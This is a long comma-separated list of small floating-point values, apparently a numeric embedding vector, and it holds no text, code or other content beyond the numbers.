-0.01941540092229843, 0.008741194382309914, 0.0012356708757579327, 0.0156062301248312, 0.0006373787764459848, 0.00206981529481709, 0.028426649048924446, -0.0026294649578630924, -0.0022812385577708483, -0.011690459214150906, 0.015592017211019993, -0.021319987252354622, -0.026280436664819717, 0.0012010259088128805, -0.006474169436842203, -0.020822521299123764, 0.01400723122060299, 0.006875695660710335, 0.023679398000240326, 0.0415881872177124, 0.007554382085800171, -0.017667163163423538, -0.00037176726618781686, -0.0250154510140419, -0.047131385654211044, -0.011086393147706985, -0.016075270250439644, -0.020765667781233788, 0.008464034646749496, -0.0036350577138364315, -0.007042702287435532, -0.023523053154349327, 0.024560624733567238, 0.0049640038050711155, -0.006783309392631054, 0.00689701596274972, 0.0028426649514585733, -0.014263071119785309, 0.031354594975709915, -0.0011104160221293569, 0.016331110149621964, 0.0017020456725731492, -0.02758806385099888, 0.010354407131671906, -0.012962551787495613, -0.005418830085545778, -0.014184897765517235, -0.009203127585351467, -0.00953714083880186, -0.025896677747368813, 0.007710728794336319, -0.016146337613463402, 0.004644203931093216, 0.011363552883267403, -0.0026987551245838404, 0.003812724258750677, -0.010020393878221512, 0.02077987976372242, 0.0049924300983548164, -0.002283015288412571, -0.03414040431380272, -0.03018910251557827, -0.0019863122142851353, 0.010112780146300793, 0.03328760713338852, -0.01129248645156622, 0.022371772676706314, -0.016274256631731987, 0.0071066622622311115, -0.006658942438662052, 0.030899768695235252, 0.017923003062605858, -0.002709415042772889, -0.0050066434778273106, 0.025768756866455078, 0.006783309392631054, -0.0051487768068909645, -0.010539180599153042, -0.04036584123969078, 0.013637685216963291, -0.006719349417835474, 0.023594118654727936, 0.008975714445114136, 0.012799099087715149, -0.027545422315597534, 0.003997497726231813, -0.019358547404408455, -0.0032228713389486074, -0.0032868313137441874, -0.002227938733994961, -0.007952354848384857, 0.024091584607958794, -0.009608207270503044, 0.011832593008875847, 0.00024784484412521124, -0.01665801741182804, 0.014867137186229229, -0.006971635855734348, -0.011136139743030071, -0.008122915402054787, -0.0136305782943964, 0.009487394243478775, 0.013460018672049046, -0.01142040640115738, 0.007966568693518639, 0.00009249764843843877, -0.01664380356669426, -0.023224571719765663, -0.012152392417192459, 0.027389077469706535, -0.00005979590059723705, 0.00007473099685739726, 0.015250897035002708, 0.006563002709299326, 0.012003152631223202, -0.03414040431380272, -0.006395996082574129, 0.018235696479678154, 0.005749289877712727, -0.006268076132982969, 0.006300056353211403, 0.0008012761827558279, -0.03297491371631622, 0.02200222574174404, -0.0045873504132032394, 0.028412435203790665, -0.004921363666653633, 0.0009425210882909596, 0.01759609580039978, 0.009423433803021908, 0.004228463862091303, 0.02045297436416149, 0.015108764171600342, -0.02053825370967388, 0.02605302445590496, 0.011335126124322414, -0.008179767988622189, -0.024631692096590996, 0.0074691022746264935, -0.020737240090966225, -0.0046015637926757336, 0.018861081451177597, 0.02414843812584877, 0.015194044448435307, 0.019870227202773094, 0.002601038431748748, 0.008862008340656757, 0.003574651200324297, 0.003677697852253914, 0.01836361549794674, 0.0011583860032260418, 0.008684341795742512, -0.002085805404931307, -0.025839824229478836, 0.008691447786986828, -0.002869314979761839, -0.013083365745842457, -0.002473118482157588, -0.008854901418089867, 0.025242865085601807, -0.024873318150639534, -0.018249908462166786, -0.016231616958975792, -0.007241689134389162, 0.0024429152254015207, -0.009217341430485249, 0.0028320050332695246, -0.0029368281830102205, 0.005944723263382912, 0.02821344882249832, 0.008876221254467964, -0.009672167710959911, 0.020069213584065437, 0.011569646187126637, -0.01535039022564888, 0.010425473563373089, -0.01440520491451025, 0.015592017211019993, 0.01648745685815811, -0.004370597191154957, -0.014284390956163406, -0.0019525554962456226, -0.005017303396016359, 0.0031500281766057014, -0.025114944204688072, -0.015122977085411549, -0.02663576975464821, -0.023693611845374107, 0.021163640543818474, 0.020069213584065437, -0.0008305911323986948, 0.006470615975558758, -0.00350358453579247, -0.0010642226552590728, -0.02147633396089077, 0.00867012795060873, -0.0022918987087905407, -0.0023007818963378668, 0.01844889484345913, -0.008130021393299103, 0.018818441778421402, 0.006850822363048792, 0.029023608192801476, 0.023992091417312622, -0.0037771910429000854, 0.012436659075319767, 0.005656903143972158, -0.013545298017561436, 0.019031642004847527, -0.0038020643405616283, -0.01671486906707287, 0.01129959337413311, 0.026081450283527374, -0.018576815724372864, 0.0007066687103360891, -0.012308739125728607, -0.02500123903155327, -0.01950068213045597, 0.010766593739390373, 0.0040010507218539715, 0.01783772185444832, -0.007120875641703606, -0.0029599247500300407, 0.031525153666734695, 0.003157134633511305, -0.0013591491151601076, 0.0019632154144346714, -0.012195033021271229, -0.0008914419449865818, -0.008087381720542908, -0.014597084373235703, 0.016757510602474213, -0.004363490734249353, 0.0027573849074542522, 0.012095538899302483, 0.030729208141565323, -0.020509827882051468, -0.012649859301745892, -0.02242862619459629, -0.013211285695433617, 0.005951829720288515, -0.0004725930339191109, -0.004434557165950537, -0.012557472102344036, -0.009196020662784576, 0.003574651200324297, 0.0030807380098849535, -0.02328142523765564, 0.01051785983145237, -0.014071191661059856, -0.005870102904736996, -0.020978868007659912, 0.026237796992063522, 0.006531022489070892, -0.025342358276247978, -0.017880361527204514, -0.04374861344695091, -0.014284390956163406, -0.010290446691215038, 0.02181745320558548, -0.0035302345640957355, -0.0038802376948297024, 0.000031813418900128454, 0.001870828913524747, 0.007632555440068245, 0.0029261682648211718, -0.0032797246240079403, -0.022826598957180977, 0.012791992165148258, 0.019699668511748314, -0.006822396069765091, 0.01513719093054533, -0.022471265867352486, 0.03331603482365608, 0.005816803313791752, -0.010581820271909237, 0.014554444700479507, -0.012593005783855915, 0.009622421115636826, -0.017923003062605858, 0.010887406766414642, 0.010930046439170837, 0.014042764902114868, -0.012457978911697865, -0.007909715175628662, -0.016530096530914307, -0.012585898861289024, -0.010276233777403831, 0.011861019767820835, 0.011271166615188122, 0.0012356708757579327, -0.0029137316159904003, 0.003645717864856124, 0.005674669984728098, -0.003299267962574959, 0.008215301670134068, -0.010162526741623878, 0.013097578659653664, 0.0037665311247110367, -0.002021845430135727, 0.0061401561833918095, 0.02321035973727703, -0.007390928920358419, 0.016501670703291893, 0.020737240090966225, 0.01863366924226284, 0.011015326716005802, -0.015989990904927254, 0.012322952039539814, -0.023011373355984688, -0.004448770545423031, 0.008350328542292118, -0.011463046073913574, 0.004498517140746117, 0.00818687491118908, -0.02743171714246273, -0.025072304531931877, 0.012848845683038235, 0.007092448882758617, -0.011356445960700512, -0.0026045916602015495, -0.00416450435295701, -0.0051096901297569275, -0.0156062301248312, 0.013388952240347862, -0.013609258458018303, -0.02527129091322422, 0.0006915670819580555, 0.028568781912326813, 0.026678411290049553, -0.015364604070782661, -0.015762576833367348, 0.0035231278743594885, -0.010361514054238796, -0.0026028151623904705, -0.016061056405305862, 0.0055503034964203835, 0.008620381355285645, -0.007419355679303408, 0.007874181494116783, 0.003313481342047453, -0.02053825370967388, -0.011313806287944317, -0.0034414012916386127, 0.016160549595952034, 0.0013138442300260067, 0.013843778520822525, -0.013580831699073315, -0.0065843225456774235, -0.008115808479487896, -0.0013262808788567781, 0.0075472756288945675, -0.01802249625325203, -0.008243728429079056, 0.015989990904927254, 0.007305649109184742, -0.02544185146689415, -0.023054013028740883, 0.014909777790307999, 0.016871215775609016, -0.015847856178879738, 0.005351316649466753, -0.009970647282898426, 0.005020856857299805, 0.026891609653830528, -0.02033926732838154, 0.008762514218688011, 0.005102583672851324, 0.011214313097298145, 0.019770734012126923, -0.010823446325957775, 0.01596156321465969, -0.020808307453989983, 0.007639661896973848, -0.029222596436738968, -0.02664998359978199, 0.020225560292601585, -0.008634595200419426, -0.003951304126530886, -0.016530096530914307, -0.03311704471707344, 0.010532073676586151, -0.003620844567194581, -0.018164629116654396, 0.019628601148724556, 0.0035710977390408516, -0.013985911384224892, 0.007902608253061771, 0.006268076132982969, 0.013332098722457886, -0.0035053612664341927, -0.01064577978104353, -0.012514832429587841, -0.0033010446932166815, 0.01775244250893593, -0.0032068814616650343, -0.004807657096534967, 0.016260042786598206, 0.013474231585860252, 0.019472254440188408, -0.021277347579598427, 0.004775676876306534, 0.0012587675591930747, -0.008144235238432884, -0.00627518305554986, 0.02406315878033638, 0.024432705715298653, 0.010027500800788403, -0.0031997747719287872, 0.01870473474264145, -0.004342170897871256, 0.006865035742521286, -0.02294030599296093, 0.001399124157615006, 0.008719874545931816, -0.00003958633169531822, -0.023238785564899445, -0.024475345388054848, 0.007369608618319035, 0.010986899957060814, 0.008030528202652931, -0.016444817185401917, -0.007689408492296934, -0.020197134464979172, -0.005600050091743469, -0.002727181650698185, 0.008250835351645947, -0.006413762923330069, 0.032292675226926804, 0.0046264370903372765, 0.017979856580495834, -0.004828976932913065, -0.019088495522737503, -0.04016685485839844, -0.004736590664833784, 0.006847269367426634, 0.0061792428605258465, 0.017581881955266, 0.0022314919624477625, -0.006811735685914755, 0.00866302102804184, 0.0034360713325440884, 0.00930972769856453, -0.0005858554504811764, 0.012450871989130974, -0.003036321373656392, 0.008748301304876804, -0.007312755566090345, 0.008222408592700958, -0.014710791409015656, 0.0007364279008470476, -0.010979793034493923, 0.009046780876815319, 0.017880361527204514, 0.0034982545766979456, 0.0034662745893001556, 0.039029788225889206, -0.011590966023504734, 0.00040863308822736144, 0.010496539995074272, 0.005489896517246962, -0.010873192921280861, -0.007103108800947666, 0.01212396565824747, -0.010155420750379562, -0.018647881224751472, -0.0035853111185133457, 0.007074682507663965, 0.004868063610047102, 0.009117848239839077, 0.02603881061077118, 0.02319614589214325, -0.000019376759155420586, -0.014454951509833336, 0.008080274797976017, -0.03837597742676735, -0.020467188209295273, -0.01880422793328762, 0.027147449553012848, 0.007255902048200369, -0.0047827837988734245, 0.0016620706301182508, 0.011789952404797077, -0.0033561212476342916, -0.018647881224751472, -0.0032548513263463974, -0.017738228663802147, 0.011733099818229675, 0.0064777228981256485, -0.0016798373544588685, -0.01440520491451025, -0.018349401652812958, 0.013708751648664474, -0.013609258458018303, -0.004910703748464584, 0.002862208290025592, 0.013730071485042572, -0.02942158281803131, -0.0013591491151601076, -0.020310841500759125, 0.018221482634544373, 0.013118898496031761, -0.009885367006063461, 0.036016564816236496, 0.0003313481283839792, -0.02062353491783142, -0.004907150287181139, -0.005887869745492935, 0.00022896777954883873, 0.02692003734409809, 0.043691761791706085, -0.01327524520456791, 0.01863366924226284, -0.012088432908058167, 0.02215857245028019, -0.02734643593430519, -0.005472130142152309, 0.00006312714685918763, 0.004878723528236151, -0.014419417828321457, -0.027190089225769043, -0.0026330184191465378, 0.037125203758478165, 0.014341244474053383, -0.00773915508762002, -0.014227538369596004, 0.005923402961343527, 0.005898529663681984, 0.009515821002423763, 0.016061056405305862, -0.0002585048496257514, 0.010596033185720444, -0.0016736190300434828, 0.005678222980350256, -0.011967618949711323, 0.017439749091863632, 0.011157459579408169, -0.011619392782449722, 0.007909715175628662, -0.031610433012247086, -0.0023967218585312366, 0.007660982199013233, 0.02483067847788334, 0.01682857610285282, 0.0025637284852564335, -0.012358485721051693, 0.012280312366783619, -0.00832190178334713, -0.01933012157678604, 0.009800087660551071, -0.014796070754528046, -0.0005538755212910473, -0.004192930646240711, -0.004192930646240711, -0.016586950048804283, 0.02208750694990158, 0.027204303070902824, -0.0035639910493046045, -0.012187926098704338, -0.001934788771905005, 0.02268446609377861, -0.015989990904927254, -0.0013769158395007253, 0.008215301670134068, 0.017724016681313515, -0.01375849824398756, 0.0103970468044281, -0.011924979276955128, -0.0001264763850485906, -0.007632555440068245, -0.009764553979039192, -0.019557535648345947, -0.001303184195421636, 0.005909189581871033, -0.009196020662784576, -0.03215054050087929, -0.03760845586657524, 0.01552095077931881, -0.01888950914144516, -0.013701644726097584, 0.0077320486307144165, 0.015179830603301525, -0.0017144823214039207, -0.0033809945452958345, -0.006232542917132378, -0.007533062249422073, -0.02200222574174404, -0.016089484095573425, -0.015066124498844147, -0.00773915508762002, 0.006310716271400452, 0.011825486086308956, 0.030729208141565323, -0.020211348310112953, -0.002720074960961938, -0.012429552152752876, -0.030046967789530754, -0.01215949933975935, 0.002085805404931307, 0.000249621516559273, 0.013943271711468697, -0.04838215559720993, -0.022357558831572533, -0.037125203758478165, -0.023153506219387054, 0.017823509871959686, -0.0052518234588205814, -0.008641701191663742, -0.004171610809862614, 0.00857774168252945, 0.008151342160999775, 0.011143246665596962, -0.007124429102987051, -0.022812386974692345, 0.004839636851102114, -0.01077369973063469, -0.008719874545931816, -0.0013778042048215866, 0.008563527837395668, -0.00927419401705265, -0.013602151535451412, -0.011818379163742065, -0.011605179868638515, -0.0033898779656738043, 0.006531022489070892, 0.007504635490477085, -0.033230751752853394, -0.012557472102344036, 0.003322364529594779, 0.0028817516285926104, -0.0019507787656039, 0.017269190400838852, 0.01853417605161667, 0.018079349771142006, -0.0054863435216248035, -0.005141670349985361, -0.00035244604805484414, -0.009288407862186432, 0.003425411181524396, -0.008421394973993301, -0.005866549909114838, 0.023949451744556427, 0.006946762558072805, 0.00496045034378767, 0.013104685582220554, -0.01500927098095417, -0.006058429833501577, 0.002116008661687374, 0.019344335421919823, 0.012912805192172527, -0.013659005053341389, 0.007625448517501354, 0.006189902778714895, -0.017539242282509804, -0.02794339694082737, -0.008840687572956085, -0.02139105275273323, 0.02173217386007309, 0.005202076863497496, 0.0067015825770795345, -0.008030528202652931, 0.012720925733447075, -0.010070140473544598, 0.00027960274019278586, -0.03689778968691826, -0.0025015452411025763, -0.006484829355031252, 0.012500619515776634, -0.004754357039928436, -0.0004690397181548178, 0.008158448152244091, 0.009025461040437222, -0.053072553128004074, -0.007156408857554197, 0.013914844952523708, 0.0014559774426743388, -0.030842915177345276, -0.0006000688299536705, -0.0041822707280516624, 0.008989928290247917, -0.018690522760152817, -0.035846006125211716, -0.004939130507409573, -0.005386849865317345, 0.003091398160904646, 0.004988877102732658, -0.006392442621290684, -0.01452601794153452, -0.010198060423135757, -0.0007035595481283963, -0.02993326261639595, 0.014206217601895332, -0.0064421892166137695, -0.0031908913515508175, -0.00433151051402092, -0.014071191661059856, 0.04090594872832298, -0.013438698835670948, -0.003496477846056223, 0.005351316649466753, 0.021234707906842232, 0.0002414044429315254, 0.012237672694027424, -0.015535163693130016, -0.0240489449352026, -0.012848845683038235, 0.00539040332660079, 0.01732604205608368, -0.009416327811777592, -0.017297616228461266, 0.003958411049097776, 0.00007062246004352346, -0.01375849824398756, 0.007568595465272665, -0.0047827837988734245, -0.0007035595481283963, -0.003986837342381477, -0.008144235238432884, -0.008570634759962559, -0.0007164403796195984, -0.02845507673919201, -0.02026820182800293, 0.009267088025808334, -0.024304784834384918, -0.009551353752613068, 0.012884378433227539, 0.018335189670324326, 0.003741657827049494, -0.0136305782943964, -0.025413423776626587, 0.007881288416683674, -0.0003777635283768177, 0.0011441726237535477, 0.006104622967541218, -0.011733099818229675, -0.006435082759708166, -0.0004708163905888796, -0.019955508410930634, -0.01402144506573677, -0.01732604205608368, -0.019472254440188408, 0.00892596784979105, 0.0044843037612736225, -0.0010953142773360014, -0.0165727362036705, 0.00828636810183525, 0.0026827650144696236, -0.01664380356669426, 0.005742182955145836, 0.021604252979159355, -0.02535657212138176, -0.011008219793438911, 0.02154739946126938, -0.015577804297208786, -0.006655389443039894, 0.010034606792032719, -0.0019632154144346714, -0.021590040996670723, -0.0022847920190542936, -0.011981832794845104, -0.006573662627488375, -0.01749660260975361, -0.013730071485042572, -0.00513456342741847, -0.016586950048804283, -0.03209368884563446, -0.01906006783246994, 0.012443765997886658, 0.019699668511748314, 0.004061457701027393, 0.013140218332409859, 0.006278736051172018, 0.0312124602496624, 0.00465841731056571, 0.0006080637685954571, 0.00465841731056571, -0.004772123880684376, 0.01897478848695755, -0.01275645848363638, -0.00508837029337883, -0.027232730761170387, 0.04059325531125069, 0.0032370847184211016, -0.020566681399941444, -0.0037238909862935543, 0.004693950526416302, 0.009458967484533787, 0.01775244250893593, 0.0006213887827470899, 0.008840687572956085, -0.03252008557319641, -0.024887531995773315, -0.0033827712759375572, 0.020026573911309242, 0.016871215775609016, -0.012330058962106705, -0.007238135673105717, 0.0015323740663006902, -0.003409421304240823, 0.0027058615814894438, 0.013104685582220554, 0.004473643843084574, 0.028511928394436836, -0.008172661997377872, -0.0236225463449955, -0.002844441682100296, -0.03243480622768402, 0.014255964197218418, 0.023011373355984688, 0.007497528567910194, -0.012955445796251297, -0.013815351761877537, 0.017354469746351242, 0.00853510107845068, -0.007902608253061771, -0.0312124602496624, 0.016970708966255188, -0.012529045343399048, -0.012948338873684406, -0.0013724741293117404, -0.002171085448935628, -0.004878723528236151, 0.014255964197218418, -0.01051785983145237, -0.005063496995717287, 0.012067113071680069, 0.01836361549794674, 0.005063496995717287, -0.006523916032165289, -0.0037629776634275913, -0.008265048265457153, 0.012315846048295498, -0.004548263736069202, -0.00307363155297935, -0.011221420019865036, 0.0158762838691473, -0.007110215723514557, -0.023906812071800232, -0.014433631673455238, 0.011065073311328888, 0.026507850736379623, 0.030643928796052933, 0.0067797559313476086, 0.00773915508762002, -0.024020519107580185, 0.013943271711468697, 0.007131535559892654, -0.01341027207672596, -0.004033030942082405, -0.0036670377012342215, -0.019259054213762283, -0.014312817715108395, 0.0037061243783682585, -0.012322952039539814, -0.0057350764982402325, -0.019713880494236946, 0.004278210923075676, -0.022130146622657776, 0.00007412026752717793, -0.018065135926008224, 0.010027500800788403, -0.011342233046889305, -0.010453900322318077, 0.011228526942431927, -0.00008089380571618676, 0.005909189581871033, 0.04761463776230812, -0.04337906837463379, 0.011576753109693527, -0.025683477520942688, -0.000028620972443604842, 0.02379310503602028, 0.008726981468498707, -0.0038091710302978754, 0.01336763147264719, -0.005177203565835953, 0.013687431812286377, -0.024901743978261948, -0.0007719611749053001, -0.026067238301038742, 0.007099555805325508, -0.010119887068867683, -0.007231028750538826, 0.012877272441983223, -0.006676709279417992, -0.0019170221639797091, -0.0020804754458367825, -0.011029539629817009, -0.013815351761877537, -0.004793443717062473, -0.017368683591485023, -0.007127982098609209, -0.0018299655057489872, -0.003045204794034362, -0.01104375347495079, 0.0017642289167270064, 0.04457298666238785, -0.0171554833650589, 0.013900631107389927, 0.0037203377578407526, -0.008023422211408615, -0.0038233844097703695, -0.019941294565796852, -0.011491472832858562, -0.01570572331547737, 0.019799161702394485, -0.017923003062605858, -0.000018405144146527164, -0.010958473198115826, 0.009480287320911884, 0.008613274432718754, 0.014653937891125679, 0.0011717109009623528, 0.021604252979159355, -0.023821532726287842, -0.0023416453041136265, -0.02767334319651127, 0.006005129776895046, 0.007895502261817455, -0.009515821002423763, 0.009196020662784576, -0.026266224682331085, 0.008627488277852535, -0.025143371894955635, -0.006847269367426634, 0.00158478575758636, -0.00033623396302573383, 0.034794218838214874, -0.015819430351257324, -0.010603140108287334, -0.008776728063821793, 0.02380731888115406, 0.03027438186109066, -0.01888950914144516, -0.01078080665320158, -0.014440737664699554, 0.026237796992063522, -0.0012871942017227411, 0.013580831699073315, -0.020936226472258568, -0.008975714445114136, -0.0054117231629788876, -0.000009036009942064993, 0.017908789217472076, -0.005170096643269062, 0.023608332499861717, -0.0029617014806717634, -0.004971110261976719, 0.0013857991434633732, 0.00035200186539441347, 0.0014852924505248666, 0.0106884203851223, -0.009423433803021908, 0.02517179772257805, 0.005440149921923876, -0.00675132917240262, 0.0068863555788993835, -0.0030967281199991703, 0.01193919312208891, 0.005472130142152309, 0.006108176428824663, -0.008819367736577988, 0.008300581946969032, 0.007575701922178268, 0.0036670377012342215, -0.012649859301745892, 0.025058090686798096, 0.017141269519925117, -0.005433043465018272, -0.034538380801677704, -0.0045589241199195385, 0.007270115427672863, -0.002933274954557419, 0.02562662400305271, 0.0007728495402261615, 0.008968607522547245, -0.008272155188024044, 0.004342170897871256, 0.008144235238432884, -0.024432705715298653, 0.006573662627488375, -0.021689534187316895, 0.02269867993891239, -0.008130021393299103, -0.0015465874457731843, -0.0007151078898459673, 0.000034561697248136625, 0.01907428167760372, 0.008641701191663742, 0.0011095276568084955, -0.013083365745842457, -0.022229639813303947, 0.000807050324510783, 0.015847856178879738, -0.0035053612664341927, -0.00319266808219254, -0.0106884203851223, 0.014838711358606815, 0.010155420750379562, -0.0016887206584215164, -0.0009389677434228361, -0.024802250787615776, -0.004718823824077845, -0.007774688769131899, 0.009196020662784576, -0.015592017211019993, 0.01052496675401926, -0.0025566217955201864, -0.010325980372726917, 0.009124954231083393, 0.007163515780121088, -0.017027562484145164, 0.010659993626177311, -0.00041685017640702426, 0.009608207270503044, 0.009721914306282997, -0.0023416453041136265, -0.0061401561833918095, 0.007916822098195553, -0.001323615899309516, -0.02011185511946678, -0.007575701922178268, -0.0056711165234446526, -0.005241163540631533, -0.0024926618207246065, -0.03240637853741646, -0.00036088519846089184, 0.00793814193457365, 0.007597022224217653, 0.02149054780602455, 0.026536276564002037, 0.009835620410740376, -0.013786925002932549, 0.015535163693130016, 0.017823509871959686, -0.026166731491684914, 0.0006351579213514924, -0.01734025590121746, 0.002124892082065344, -0.013786925002932549, 0.014582871459424496, -0.0006826837779954076, -0.019784947857260704, 0.02692003734409809, -0.009608207270503044, 0.027360649779438972, 0.0022385986521840096, 0.01836361549794674, -0.0030327681452035904, 0.0007133312174119055, -0.0036599310114979744, -0.0006849045748822391, -0.0025939317420125008, 0.0057741631753742695, 0.0044843037612736225, 0.010148313827812672, 0.009842727333307266, -0.0365566723048687, -0.007454888895153999, 0.00485029723495245, 0.014938204549252987, -0.010979793034493923, 0.02284081280231476, 0.035334326326847076, -0.00953714083880186, -0.005401063244789839, -0.02603881061077118, 0.008087381720542908, 0.002649008296430111, 0.011953406035900116, -0.006555895786732435, -0.007298542186617851, 0.00582035630941391, 0.02052404172718525, 0.00965795386582613, 0.00359952449798584, -0.006936102639883757, -0.0022883452475070953, 0.01353819202631712, -0.004754357039928436, 0.0031908913515508175, 0.0045624771155416965, -0.03132616728544235, 0.0052518234588205814, -0.023139292374253273, 0.012884378433227539, 0.009629527106881142, 0.015492524020373821, -0.01596156321465969, -0.021149426698684692, 0.00016956051695160568, -0.01689964346587658, 0.0009149827528744936, 0.01751081645488739, 0.007255902048200369, 0.01262853853404522, 0.006204116158187389, -0.014547337777912617, 0.027929183095693588, 0.019045855849981308, -0.0048609571531414986, -0.005489896517246962, 0.011676246300339699, -0.010190953500568867, -0.011718885973095894, 0.007952354848384857, 0.009196020662784576, 0.024176865816116333, 0.016160549595952034, 0.004502070602029562, -0.015634657815098763, -0.041275493800640106, 0.002227938733994961, 0.01761030964553356, -0.011143246665596962, -0.031525153666734695, 0.014696577563881874, 0.0001229230547323823, 0.018676308915019035, 0.0194011889398098, -0.0077320486307144165, 0.002558398526161909, 0.007081788964569569, -0.0016007756348699331, -0.014433631673455238, -0.016004202887415886, 0.004910703748464584, 0.03001854196190834, 0.011050860397517681, -0.014952417463064194, 0.004740143660455942, 0.0030949513893574476, -0.00191879877820611, -0.02328142523765564, -0.007440675515681505, 0.013680324889719486, -0.005294463597238064, -0.00644929613918066, 0.012436659075319767, -0.016672229394316673, -0.02294030599296093, 0.012948338873684406, -0.010148313827812672, -0.01707020215690136, -0.0076538752764463425, -0.008087381720542908, -0.000629827962256968, -0.0001897700858535245, 0.005831016227602959, 0.00304165156558156, 0.018349401652812958, -0.02154739946126938, -0.006573662627488375, -0.006761989090591669, 0.026891609653830528, 0.00819398183375597, -0.03595971316099167, -0.01535039022564888, 0.0054365964606404305, 0.01522247027605772, -0.002680988283827901, 0.014291497878730297, -0.00820108875632286, -0.003787850961089134, -0.033088620752096176, 0.002544185146689415, -0.0011299593606963754, 0.003006118116900325, -0.008172661997377872, -0.001005592755973339, -0.015975777059793472, -0.0013262808788567781, -0.004629990551620722, 0.021277347579598427, -0.010212273336946964, 0.0030896214302629232, 0.011093500070273876, -0.02812816947698593, 0.006566556170582771, -0.0156062301248312, 0.002679211786016822, -0.002583271823823452, -0.030075395479798317, -0.012664072215557098, 0.009501607157289982, -0.014909777790307999, -0.02070881426334381, -0.024816464632749557, -0.017354469746351242, 0.00854220800101757, -0.02474539913237095, 0.0022137253545224667, -0.021604252979159355, -0.0002951485803350806, 0.011057966388761997, 0.015421457588672638, 0.011406193487346172, 0.010866086930036545, 0.00047436970635317266, 0.010148313827812672, 0.003185561392456293, 0.011278273537755013, -0.005365530028939247, 0.0026205817703157663, 0.015634657815098763, -0.0025637284852564335, 0.006307162810117006, 0.013047832064330578, 0.0037238909862935543, 0.013097578659653664, -0.006602089386433363, 0.014092511497437954, -0.005457916762679815, 0.014462057501077652, -0.002679211786016822, 0.0025353017263114452, 0.012500619515776634, 0.012998085469007492, -0.017283402383327484, 0.011498579755425453, 0.008613274432718754, -0.010027500800788403, -0.012301632203161716, 0.01440520491451025, 0.009970647282898426, 0.005944723263382912, -0.0025566217955201864, 0.005361976567655802, 0.010112780146300793, 0.03138302266597748, -0.009117848239839077, 0.034794218838214874, 0.0029545947909355164, -0.02018292061984539, -0.004505624063313007, -0.012969658710062504, -0.020595107227563858, 0.01672908291220665, -0.015435670502483845, 0.023579904809594154, 0.015094551257789135, 0.016430603340268135, -0.0052660368382930756, 0.01897478848695755, 0.008115808479487896, 0.0030309914145618677, -0.00627518305554986, -0.022229639813303947, -0.008719874545931816, -0.016231616958975792, -0.028327155858278275, -0.012081325985491276, -0.0018024272285401821, 0.012656965292990208, -0.0156062301248312, -0.004160950891673565, -0.021845880895853043, 0.00944475457072258, 0.00037620894727297127, 0.004313744138926268, -0.015549377538263798, 0.0005365529796108603, 0.012010259553790092, -0.0014177791308611631, -0.011747312732040882, -0.0054863435216248035, 0.019685454666614532, 0.02129155956208706, -0.01276356540620327, 0.003915770910680294, 0.00007134422776289284, -0.001522602397017181, 0.0059944698587059975, 0.0036350577138364315, -0.0203676950186491, -0.025683477520942688, 0.017226548865437508, 0.007419355679303408, 0.013687431812286377, -0.00014923990238457918, -0.00045882389531470835, -0.025129158049821854, 0.009039674885571003, 0.016942283138632774, 0.010098567232489586, 0.0074691022746264935, 0.011505686677992344, -0.003313481342047453, 0.005365530028939247, 0.023650972172617912, 0.000954957737121731, -0.00893307477235794, 0.0171554833650589, -0.006694476120173931, 0.008719874545931816, -0.021149426698684692, -0.0027307351119816303, -0.01552095077931881, 0.009217341430485249, 0.0035924178082495928, 0.0090609947219491, -0.008471141569316387, -0.00035866437247022986, 0.008513781242072582, 0.010368620045483112, -0.017567669972777367, -0.007582808844745159, 0.007973674684762955, -0.014710791409015656, 0.004317297600209713, -0.0016220957040786743, -0.009338154457509518, -0.016871215775609016, -0.027147449553012848, -0.017382895573973656, -0.01043968740850687, 0.021675320342183113, -0.003327694721519947, -0.003265511244535446, 0.007010722532868385, 0.02183166705071926, 0.007945248857140541, -0.024105798453092575, -0.025498704984784126, 0.011541219428181648, -0.00651325611397624, 0.005987362936139107, -0.017567669972777367, -0.023409346118569374, 0.005809696391224861, -0.0026259117294102907, 0.019116921350359917, 0.004399023950099945, 0.011598072946071625, -0.009167594835162163, -0.01579100452363491, -0.005077710375189781, -0.01647324301302433, 0.00867012795060873, 0.010446793399751186, -0.012855952605605125, -0.004082777537405491, -0.010958473198115826, -0.020993079990148544, -0.019429614767432213, 0.01190365944057703, 0.008911754935979843, 0.01125695277005434, -0.001893925480544567, 0.030842915177345276, 0.018917934969067574, 0.008229514583945274, 0.02612408995628357, -0.004644203931093216, 0.003883790923282504, 0.0031518046744167805, 0.030643928796052933, 0.004306637216359377, 0.020168708637356758, 0.007973674684762955, -0.00409343745559454, 0.0061792428605258465, 0.00044394430005922914, -0.00534421019256115, 0.010461007244884968, 0.012912805192172527, -0.025825610384345055, 0.007788902148604393, -0.023167720064520836, 0.030160674825310707, 0.0017766655655577779, 0.0014995057135820389, -0.0015119423624128103, -0.012855952605605125, 0.01151279266923666, 0.002227938733994961, 0.0038553643971681595, -0.007447781972587109, -0.004232017323374748, 0.012713818810880184, -0.021845880895853043, -0.013438698835670948, 0.027374863624572754, -0.009999074041843414, -0.003107388038188219, -0.0005432154866866767, 0.015165617689490318, -0.022442840039730072, 0.0047827837988734245, -0.005607156548649073, 0.00041818266618065536, 0.017013350501656532, 0.013815351761877537, 0.000042195806599920616, 0.005944723263382912, 0.0006729121087118983, -0.008215301670134068, -0.008691447786986828, 0.016615375876426697, -0.00304165156558156, -0.0009149827528744936, 0.0027147450018674135, -0.006602089386433363, 0.011249846778810024, -0.014462057501077652, -0.01090872660279274, 0.024773824959993362, 0.0041822707280516624, -0.002190628554672003, -0.004072117619216442, -0.007660982199013233, -0.02674947679042816, 0.007369608618319035, 0.0034449545200914145, 0.012806205078959465, -0.008997034281492233, -0.020651960745453835, 0.004065010696649551, -0.0015519174048677087, 0.025555558502674103, 0.0016611822647973895, 0.002837334992364049, 0.014348351396620274, -0.00036932434886693954, -0.0051878634840250015, 0.005667563062161207, 0.030245954170823097, 0.01621740311384201, 0.014838711358606815, -0.0007470878772437572, 0.01829254813492298, 0.0043386174365878105, -0.0033152580726891756, -0.000024165428840206005, -0.009203127585351467, 0.013616365380585194, 0.01802249625325203, 0.004242677241563797, 0.019614387303590775, 0.018392041325569153, 0.00025250858743675053, 0.0045873504132032394, -0.014419417828321457, 0.005067050457000732, 0.015421457588672638, 0.0007746262126602232, -0.03112718090415001, -0.005468576680868864, -0.0078102219849824905, 0.009025461040437222, -0.0036919109988957644, -0.025143371894955635, -0.012010259553790092, -0.017652949318289757, 0.007305649109184742, 0.006186349783092737, -0.002490885090082884, 0.0038091710302978754, -0.006022896151989698, 0.0029048481956124306, 0.011050860397517681, -0.014433631673455238, -0.0004850297118537128, -0.021149426698684692, 0.0004408351378515363, -0.02069460041821003, -0.0020556021481752396, -0.029080461710691452, 0.001266762614250183, -0.007412248756736517, 0.023921025916934013, 